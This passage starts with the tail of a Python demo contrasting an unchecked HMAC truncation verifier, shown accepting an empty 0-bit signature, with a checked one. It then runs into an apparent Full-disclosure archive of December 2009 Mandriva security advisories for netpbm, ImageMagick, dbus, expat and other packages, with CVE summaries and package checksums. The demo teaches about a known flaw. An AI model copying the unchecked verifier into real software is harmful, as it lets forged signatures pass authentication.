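    if output_bits is None:  # no truncation requested in the document
        output_bits = full_bits
    if output_bits % 8 != 0:
        return False
    if not (min_output_bits(digest_name) <= output_bits <= full_bits):
        return False
    n = output_bits // 8
    if len(sig_value) != n:  # presented value must be exactly the stated length
        return False
    return hmac.compare_digest(full[:n], sig_value)


# Constructed key and data for the demonstration.
KEY = b"constructed-shared-key"
DATA = b"<SignedInfo>constructed</SignedInfo>"

if __name__ == "__main__":
    good = sign(KEY, DATA)
    print("minimum bits for sha1:          ", min_output_bits("sha1"))
    print("unchecked, 0-bit empty value:   ", verify_unchecked(KEY, DATA, b"", 0))
    print("checked,   0-bit empty value:   ", verify_checked(KEY, DATA, b"", 0))
    print("checked,   80-bit truncation:   ", verify_checked(KEY, DATA, good[:10], 80))
    print("checked,   72-bit truncation:   ", verify_checked(KEY, DATA, good[:9], 72))
```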


[Full-disclosure] [ MDVSA-2009:317 ] netpbm

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:317
 http://www.mandriva.com/security/
 ___

 Package : netpbm
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities have been identified and fixed
 in netpbm:
 
 Multiple integer overflows in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via a crafted
 image file, related to integer multiplication for memory allocation
 (CVE-2008-3520).
 
 Buffer overflow in the jas_stream_printf function in
 libjasper/base/jas_stream.c in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via
 vectors related to the mif_hdr_put function and use of vsprintf
 (CVE-2008-3522).
 
 pamperspective in Netpbm before 10.35.48 does not properly calculate
 a window height, which allows context-dependent attackers to cause a
 denial of service (crash) via a crafted image file that triggers an
 out-of-bounds read (CVE-2008-4799).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update fixes this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4799
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 7b0e45d3f024f928bf5efef1523d2bdc  
2008.0/i586/libnetpbm10-10.34-8.2mdv2008.0.i586.rpm
 1429258b5054e99c9bcf17627ad84ff5  
2008.0/i586/libnetpbm-devel-10.34-8.2mdv2008.0.i586.rpm
 d8a371066d668d750e0d5013b11a5bc4  
2008.0/i586/libnetpbm-static-devel-10.34-8.2mdv2008.0.i586.rpm
 a89f33b6a389d50260acd1fa998a5c6f  
2008.0/i586/netpbm-10.34-8.2mdv2008.0.i586.rpm 
 5a12f1cb9aec58e40d4bddaa4f08495a  
2008.0/SRPMS/netpbm-10.34-8.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 53601f6261a9135bcd1bc2fd02f1569d  
2008.0/x86_64/lib64netpbm10-10.34-8.2mdv2008.0.x86_64.rpm
 b8c2205ef64eebf42ae191fcb806523a  
2008.0/x86_64/lib64netpbm-devel-10.34-8.2mdv2008.0.x86_64.rpm
 db3819cfc6341148161d3ee6c0301067  
2008.0/x86_64/lib64netpbm-static-devel-10.34-8.2mdv2008.0.x86_64.rpm
 6d85ae6f25d97c8defa9891d63721956  
2008.0/x86_64/netpbm-10.34-8.2mdv2008.0.x86_64.rpm 
 5a12f1cb9aec58e40d4bddaa4f08495a  
2008.0/SRPMS/netpbm-10.34-8.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDVSA-2009:260-1 ] imagemagick

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:260-1
 http://www.mandriva.com/security/
 ___

 Package : imagemagick
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in ImageMagick,
 which could lead to integer overflow in the XMakeImage function in
 magick/xwindow.c, allowing remote attackers to cause a denial of
 service (crash) and possibly execute arbitrary code via a crafted
 TIFF file, which triggers a buffer overflow (CVE-2009-1882).
 
 This update fixes this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1882
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 a518c3799c49cd407ca123eedd27631c  
2008.0/i586/imagemagick-6.3.2.9-10.3mdv2008.0.i586.rpm
 72f4b32919fa8420cca925510fca21c8  
2008.0/i586/imagemagick-desktop-6.3.2.9-10.3mdv2008.0.i586.rpm
 b0e5e58e38f7acd560aeb5bd53d065ed  
2008.0/i586/imagemagick-doc-6.3.2.9-10.3mdv2008.0.i586.rpm
 ef3b5f6c1800fd10fbf7a437774d986c  
2008.0/i586/libmagick10.7.0-6.3.2.9-10.3mdv2008.0.i586.rpm
 a3549fa4fa21089ff6b43e102932949e  
2008.0/i586/libmagick10.7.0-devel-6.3.2.9-10.3mdv2008.0.i586.rpm
 5dde39fb31d70d8b20ce9b17e4baf457  
2008.0/i586/perl-Image-Magick-6.3.2.9-10.3mdv2008.0.i586.rpm 
 4dd3532a6395bfbf5faa1e99207e016f  
2008.0/SRPMS/imagemagick-6.3.2.9-10.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 eac3f25719308817fae16f61b884fdd1  
2008.0/x86_64/imagemagick-6.3.2.9-10.3mdv2008.0.x86_64.rpm
 64b28aeaff64cdf08995bdc48b8af531  
2008.0/x86_64/imagemagick-desktop-6.3.2.9-10.3mdv2008.0.x86_64.rpm
 0fb0ab2f564fca7d63030c42e73757c3  
2008.0/x86_64/imagemagick-doc-6.3.2.9-10.3mdv2008.0.x86_64.rpm
 51735dba9c7ffb6cbfb4b32fc4bcd02b  
2008.0/x86_64/lib64magick10.7.0-6.3.2.9-10.3mdv2008.0.x86_64.rpm
 ae9e8d6f4dc0422a86314ed0ba07d05e  
2008.0/x86_64/lib64magick10.7.0-devel-6.3.2.9-10.3mdv2008.0.x86_64.rpm
 96ca02b20d2340f94cd1a23a08d905af  
2008.0/x86_64/perl-Image-Magick-6.3.2.9-10.3mdv2008.0.x86_64.rpm 
 4dd3532a6395bfbf5faa1e99207e016f  
2008.0/SRPMS/imagemagick-6.3.2.9-10.3mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDVSA-2009:254-1 ] graphviz

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:254-1
 http://www.mandriva.com/security/
 ___

 Package : graphviz
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in graphviz:
 
 Stack-based buffer overflow in the push_subg function in parser.y
 (lib/graph/parser.c) in Graphviz 2.20.2, and possibly earlier versions,
 allows user-assisted remote attackers to cause a denial of service
 (memory corruption) or execute arbitrary code via a DOT file with a
 large number of Agraph_t elements (CVE-2008-4555).
 
 This update provides a fix for this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4555
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 66513a7de994941334cb9978ef45b7d4  
2008.0/i586/graphviz-2.12-6.1mdv2008.0.i586.rpm
 15389ed7995925ff6259431515b243a2  
2008.0/i586/graphviz-doc-2.12-6.1mdv2008.0.i586.rpm
 b396a868cf088e657346e71b031f44e4  
2008.0/i586/libgraphviz3-2.12-6.1mdv2008.0.i586.rpm
 1425b473e0dedb8c932789d650e0c422  
2008.0/i586/libgraphviz-devel-2.12-6.1mdv2008.0.i586.rpm
 688e71bbf9e31c4dabcb949cf837d7db  
2008.0/i586/libgraphvizlua0-2.12-6.1mdv2008.0.i586.rpm
 4951fc7c6b55c6bd1d43ad155f8237de  
2008.0/i586/libgraphvizperl0-2.12-6.1mdv2008.0.i586.rpm
 05909fd4aab2819a71b34a6c2f3a3fc8  
2008.0/i586/libgraphvizphp0-2.12-6.1mdv2008.0.i586.rpm
 d4592f3bc8999d959b2ed6aa876dbc68  
2008.0/i586/libgraphvizpython0-2.12-6.1mdv2008.0.i586.rpm
 97c611b99148ce0dcde376848d934242  
2008.0/i586/libgraphvizruby0-2.12-6.1mdv2008.0.i586.rpm
 9c380373a067793f37f79d90bd0c3748  
2008.0/i586/libgraphviz-static-devel-2.12-6.1mdv2008.0.i586.rpm
 d83afe7a2cbbf72d495b231bdf6c64ab  
2008.0/i586/libgraphviztcl0-2.12-6.1mdv2008.0.i586.rpm 
 fea4aca29cfaaceffc5f99ffd3e6e52e  
2008.0/SRPMS/graphviz-2.12-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e0cd3f43cd6022b37c65b32a44edcbec  
2008.0/x86_64/graphviz-2.12-6.1mdv2008.0.x86_64.rpm
 1c297b2eaadcd86a12ddbe010868be62  
2008.0/x86_64/graphviz-doc-2.12-6.1mdv2008.0.x86_64.rpm
 2d4f853e7e19d0b6adbe2daa91c0ae25  
2008.0/x86_64/lib64graphviz3-2.12-6.1mdv2008.0.x86_64.rpm
 50d617d1c796dd1a09c551b95246eb1f  
2008.0/x86_64/lib64graphviz-devel-2.12-6.1mdv2008.0.x86_64.rpm
 ef79a36bba2c3591dab7b6eb49ac7079  
2008.0/x86_64/lib64graphvizlua0-2.12-6.1mdv2008.0.x86_64.rpm
 7584dd077e94340d5fbb70a01d67e256  
2008.0/x86_64/lib64graphvizperl0-2.12-6.1mdv2008.0.x86_64.rpm
 37cc9f451193e4cf3160169890c43fa5  
2008.0/x86_64/lib64graphvizphp0-2.12-6.1mdv2008.0.x86_64.rpm
 d7c0a823e05da80dc2686d08573157b3  
2008.0/x86_64/lib64graphvizpython0-2.12-6.1mdv2008.0.x86_64.rpm
 b6c220c08353bc544a1f51d9dd722277  
2008.0/x86_64/lib64graphvizruby0-2.12-6.1mdv2008.0.x86_64.rpm
 ce066b8e7d6906cf5010b6f7ce795246  
2008.0/x86_64/lib64graphviz-static-devel-2.12-6.1mdv2008.0.x86_64.rpm
 7f13f94606b95405faca672feea36f16  
2008.0/x86_64/lib64graphviztcl0-2.12-6.1mdv2008.0.x86_64.rpm 
 fea4aca29cfaaceffc5f99ffd3e6e52e  
2008.0/SRPMS/graphviz-2.12-6.1mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGmTmmqjQ0CJFipgRAvUIAKCUvzm24mw9PvCsXoDnW5mfvqpBOgCfYpQD
52KII6WS0xXBcNmzCerF8Vo=
=MDeI
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:256-1 ] dbus

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:256-1
 http://www.mandriva.com/security/
 ___

 Package : dbus
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in dbus:
 
 The _dbus_validate_signature_with_reason function
 (dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic
 to validate a basic type, which allows remote attackers to spoof a
 signature via a crafted key.  NOTE: this is due to an incorrect fix
 for CVE-2008-3834 (CVE-2009-1189).
 
 This update provides a fix for this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1189
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 f6f698df9a6c96f40da512b22d24f8bb  2008.0/i586/dbus-1.0.2-10.4mdv2008.0.i586.rpm
 624b6fc20eea9f20a7d37082dc11fb08  
2008.0/i586/dbus-x11-1.0.2-10.4mdv2008.0.i586.rpm
 b86eaa6581bf1a7922eb688e81530bf2  
2008.0/i586/libdbus-1_3-1.0.2-10.4mdv2008.0.i586.rpm
 c9c2d25d13d1ebc5c4be9c742336a513  
2008.0/i586/libdbus-1_3-devel-1.0.2-10.4mdv2008.0.i586.rpm 
 9c8c7a0733cba7e36624deb5a9328401  2008.0/SRPMS/dbus-1.0.2-10.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4d553999e6e34391b85953fedba7b051  
2008.0/x86_64/dbus-1.0.2-10.4mdv2008.0.x86_64.rpm
 af7e3a9c174f96f25861ed4f82628927  
2008.0/x86_64/dbus-x11-1.0.2-10.4mdv2008.0.x86_64.rpm
 471b586bb2c1b2c6615b7eeb9243a50e  
2008.0/x86_64/lib64dbus-1_3-1.0.2-10.4mdv2008.0.x86_64.rpm
 5969a7c3e9310fbbde6842ed54d209df  
2008.0/x86_64/lib64dbus-1_3-devel-1.0.2-10.4mdv2008.0.x86_64.rpm 
 9c8c7a0733cba7e36624deb5a9328401  2008.0/SRPMS/dbus-1.0.2-10.4mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGmIxmqjQ0CJFipgRAiNjAJ96Osr3StLyN0FMfiFcWCm2GudN0QCgzZyz
QM6afX8rbxlVIOI+USTtgj4=
=3r06
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:249-1 ] newt

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:249-1
 http://www.mandriva.com/security/
 ___

 Package : newt
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in newt:
 
 A heap-based buffer overflow flaw was found in the way newt processes
 content that is to be displayed in a text dialog box. A local attacker
 could issue a specially-crafted text dialog box display request
 (direct or via a custom application), leading to a denial of service
 (application crash) or, potentially, arbitrary code execution with the
 privileges of the user running the application using the newt library
 (CVE-2009-2905).
 
 This update provides a solution to this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2905
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 654a1c3c587c6a5a14e6f4d23e890483  
2008.0/i586/libnewt0.52-0.52.6-3.1mdv2008.0.i586.rpm
 f0942a5df8fa536a02126f4034d3e53f  
2008.0/i586/libnewt0.52-devel-0.52.6-3.1mdv2008.0.i586.rpm
 0ce830ecabb85460249e58f53d1fe2c9  
2008.0/i586/newt-0.52.6-3.1mdv2008.0.i586.rpm 
 228d192869250f150207ce14e8374fec  2008.0/SRPMS/newt-0.52.6-3.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 889b8c64d20e91ae4e05d0c7945cd45e  
2008.0/x86_64/lib64newt0.52-0.52.6-3.1mdv2008.0.x86_64.rpm
 57e8e2c4cffe147722dbc4a0054459c9  
2008.0/x86_64/lib64newt0.52-devel-0.52.6-3.1mdv2008.0.x86_64.rpm
 d960d8c779078deea2e6c33b70b9685d  
2008.0/x86_64/newt-0.52.6-3.1mdv2008.0.x86_64.rpm 
 228d192869250f150207ce14e8374fec  2008.0/SRPMS/newt-0.52.6-3.1mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGl7ZmqjQ0CJFipgRAnviAJ9auPOyGciiDPdEAd6yvoiZKNlcZQCfWw8B
UPOkLw5FvPeXtYNk1GTBBeU=
=VpMX
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:243-2 ] freetype2

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:243-2
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple integer overflows in FreeType 2.3.9 and earlier allow remote
 attackers to execute arbitrary code via vectors related to large
 values in certain inputs in (1) smooth/ftsmooth.c, (2) sfnt/ttcmap.c,
 and (3) cff/cffload.c.
 
 This update corrects the problem.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0946
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 ab2bab7fe8862cb5b34eb29d1da21ae5  
2008.0/i586/libfreetype6-2.3.5-2.2mdv2008.0.i586.rpm
 db8544957e7dcc76329dc2912c579a78  
2008.0/i586/libfreetype6-devel-2.3.5-2.2mdv2008.0.i586.rpm
 69b7be3a3db9012d32b447c15d8831a1  
2008.0/i586/libfreetype6-static-devel-2.3.5-2.2mdv2008.0.i586.rpm 
 a41065d92d040af4b20af46eefb69451  
2008.0/SRPMS/freetype2-2.3.5-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d37a6e8aef8d356c70441b414b848121  
2008.0/x86_64/lib64freetype6-2.3.5-2.2mdv2008.0.x86_64.rpm
 8401b1d160bf2e326c26a3d7602ff650  
2008.0/x86_64/lib64freetype6-devel-2.3.5-2.2mdv2008.0.x86_64.rpm
 ee316bce2591abed02cbb594a01d17f1  
2008.0/x86_64/lib64freetype6-static-devel-2.3.5-2.2mdv2008.0.x86_64.rpm 
 a41065d92d040af4b20af46eefb69451  
2008.0/SRPMS/freetype2-2.3.5-2.2mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGlqxmqjQ0CJFipgRAu8vAJsFxX4MxG1u/B1wZFznf/MzBcUuOQCgwhTH
MxHwekRBqWMDO7qZg672zBE=
=4BOY
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:234-2 ] silc-toolkit

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:234-2
 http://www.mandriva.com/security/
 ___

 Package : silc-toolkit
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in silc-toolkit:
 
 Multiple format string vulnerabilities in lib/silcclient/client_entry.c
 in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.10, and
 SILC Client before 1.1.8, allow remote attackers to execute arbitrary
 code via format string specifiers in a nickname field, related to the
 (1) silc_client_add_client, (2) silc_client_update_client, and (3)
 silc_client_nickname_format functions (CVE-2009-3051).
 
 The silc_asn1_encoder function in lib/silcasn1/silcasn1_encode.c in
 Secure Internet Live Conferencing (SILC) Toolkit before 1.1.8 allows
 remote attackers to overwrite a stack location and possibly execute
 arbitrary code via a crafted OID value, related to incorrect use of
 a %lu format string (CVE-2008-7159).
 
 The silc_http_server_parse function in lib/silchttp/silchttpserver.c in
 the internal HTTP server in silcd in Secure Internet Live Conferencing
 (SILC) Toolkit before 1.1.9 allows remote attackers to overwrite
 a stack location and possibly execute arbitrary code via a crafted
 Content-Length header, related to incorrect use of a %lu format string
 (CVE-2008-7160).
 
 Multiple format string vulnerabilities in lib/silcclient/command.c
 in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.10,
 and SILC Client 1.1.8 and earlier, allow remote attackers to execute
 arbitrary code via format string specifiers in a channel name, related
 to (1) silc_client_command_topic, (2) silc_client_command_kick,
 (3) silc_client_command_leave, and (4) silc_client_command_users
 (CVE-2009-3163).
 
 This update provides a solution to these vulnerabilities.

 Update:

 Packages for MES5 were not provided previously; this update addresses
 this problem.
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3051
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7159
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7160
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3163
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 4deec485d40326e0739b7da3998787ed  
2008.0/i586/libsilc-1.1_2-1.1.2-2.2mdv2008.0.i586.rpm
 c3e7b417ad4cbb458e099794cab7405a  
2008.0/i586/libsilcclient-1.1_2-1.1.2-2.2mdv2008.0.i586.rpm
 826d5dca12e52f0f85dad21c940a  
2008.0/i586/silc-toolkit-1.1.2-2.2mdv2008.0.i586.rpm
 e5b0fda04c3caa276f3b1756ac838c89  
2008.0/i586/silc-toolkit-devel-1.1.2-2.2mdv2008.0.i586.rpm 
 4901eb44eaf1632da20c1e460b23edbc  
2008.0/SRPMS/silc-toolkit-1.1.2-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 9ee2ebe46efbfc9ae9254dd37312dd69  
2008.0/x86_64/lib64silc-1.1_2-1.1.2-2.2mdv2008.0.x86_64.rpm
 351348a77adbcc686df498b9164ffe0c  
2008.0/x86_64/lib64silcclient-1.1_2-1.1.2-2.2mdv2008.0.x86_64.rpm
 995aabe91251d812e5b4aa86e5d3e775  
2008.0/x86_64/silc-toolkit-1.1.2-2.2mdv2008.0.x86_64.rpm
 a93052fa1de76316511e1867b7295f47  
2008.0/x86_64/silc-toolkit-devel-1.1.2-2.2mdv2008.0.x86_64.rpm 
 4901eb44eaf1632da20c1e460b23edbc  
2008.0/SRPMS/silc-toolkit-1.1.2-2.2mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGliNmqjQ0CJFipgRAv2NAJ9ho45f9nXQXjhaOUYkocOFXGqXGQCfYoxe
RO+f4vxtTC4S5YY634y79tY=
=uMX1
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:229-1 ] cyrus-imapd

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:229-1
 http://www.mandriva.com/security/
 ___

 Package : cyrus-imapd
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in cyrus-imapd:
 
 Buffer overflow in the SIEVE script component (sieve/script.c) in
 cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14 allows local users
 to execute arbitrary code and read or modify arbitrary messages via
 a crafted SIEVE script, related to the incorrect use of the sizeof
 operator for determining buffer length, combined with an integer
 signedness error (CVE-2009-2632).
 
 This update provides a solution to this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2632
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3624587d9792be346e43e89fdefca08f  
2008.0/i586/cyrus-imapd-2.3.8-4.1mdv2008.0.i586.rpm
 964fdf726329871c4cce92f11da00692  
2008.0/i586/cyrus-imapd-devel-2.3.8-4.1mdv2008.0.i586.rpm
 5fd6c344a226014105f01cec643fc24f  
2008.0/i586/cyrus-imapd-murder-2.3.8-4.1mdv2008.0.i586.rpm
 07ed14c27d7cbf32ca9fe1a16a244907  
2008.0/i586/cyrus-imapd-nntp-2.3.8-4.1mdv2008.0.i586.rpm
 8a0b889b937ea0e4bb2082979c17  
2008.0/i586/cyrus-imapd-utils-2.3.8-4.1mdv2008.0.i586.rpm
 86f444535a86d7fb3f608e2c7612df75  
2008.0/i586/perl-Cyrus-2.3.8-4.1mdv2008.0.i586.rpm 
 5b9213e9db4ccc29efe4c5c389436aaf  
2008.0/SRPMS/cyrus-imapd-2.3.8-4.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d6efe505d3695fc96ca96c6a1e43b01a  
2008.0/x86_64/cyrus-imapd-2.3.8-4.1mdv2008.0.x86_64.rpm
 08759474f31a25d5b48179cabccc873e  
2008.0/x86_64/cyrus-imapd-devel-2.3.8-4.1mdv2008.0.x86_64.rpm
 029231ca655d20e016146f1b5988f4c8  
2008.0/x86_64/cyrus-imapd-murder-2.3.8-4.1mdv2008.0.x86_64.rpm
 1573bb824fa3d2747b7bf5ed64034ba8  
2008.0/x86_64/cyrus-imapd-nntp-2.3.8-4.1mdv2008.0.x86_64.rpm
 ff36f2669c5007afc4b232ac9ed59d83  
2008.0/x86_64/cyrus-imapd-utils-2.3.8-4.1mdv2008.0.x86_64.rpm
 ff65dff0ef99b87e81b52a9e4946658f  
2008.0/x86_64/perl-Cyrus-2.3.8-4.1mdv2008.0.x86_64.rpm 
 5b9213e9db4ccc29efe4c5c389436aaf  
2008.0/SRPMS/cyrus-imapd-2.3.8-4.1mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGlX9mqjQ0CJFipgRAiZAAJ90vfOd0KH1OlBegEA29vg98+Ga5ACffAgl
VP8ROOVBxJt907M/TP1pD2I=
=VOgd
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:232-1 ] libsamplerate

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:232-1
 http://www.mandriva.com/security/
 ___

 Package : libsamplerate
 Date: December 5, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A security vulnerability has been identified and fixed in
 libsamplerate:
 
 Lev Givon discovered a buffer overflow in libsamplerate that could
 lead to a segfault with specially crafted python code. This problem has
 been fixed with libsamplerate-0.1.7 but older versions are affected.
 
 This update provides a solution to this vulnerability.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 https://qa.mandriva.com/47888
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 290f0033591de0cc95c750835258bad0  
2008.0/i586/libsamplerate0-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm
 557bcf34b3450007c4ffb8671a6e3d2b  
2008.0/i586/libsamplerate-devel-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm
 26264fd8df3e45c60dd7581db76206c6  
2008.0/i586/libsamplerate-progs-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm 
 be95453f0805615f1dbde56ae4563ae6  
2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 fdb95011f55dea45e840374777aa2b99  
2008.0/x86_64/lib64samplerate0-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm
 87de9f39334ef5a34e6e9d28ae8eba08  
2008.0/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm
 7b88ed9ce39522a38c20f9d501edc58b  
2008.0/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm 
 be95453f0805615f1dbde56ae4563ae6  
2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.2mdv2008.0.src.rpm
 ___

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGlONmqjQ0CJFipgRAgRXAKC9yC0sbyZMa/n1PWFqRYdGoDAXNACgwJpY
hf8Xa7tj+kfTCQvF7m9GMVk=
=DfQA
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2009:316 ] expat

2009-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:316
 http://www.mandriva.com/security/
 ___

 Package : expat
 Date: December 5, 2009
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,
   Enterprise Server 5.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in expat:
 
 The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1,
 as used in the XML-Twig module for Perl, allows context-dependent
 attackers to cause a denial of service (application crash) via an
 XML document with malformed UTF-8 sequences that trigger a buffer
 over-read, related to the doProlog function in lib/xmlparse.c,
 a different vulnerability than CVE-2009-2625 and CVE-2009-3720
 (CVE-2009-3560).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update provides a solution to these vulnerabilities.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 9108b905fb1da6ed2fa0f83a0c386641  2008.0/i586/expat-2.0.1-4.2mdv2008.0.i586.rpm
 f204a06346e382581b0d3f3301ffadd3  
2008.0/i586/libexpat1-2.0.1-4.2mdv2008.0.i586.rpm
 ab9269a6452f0191d17b88a7cae90949  
2008.0/i586/libexpat1-devel-2.0.1-4.2mdv2008.0.i586.rpm 
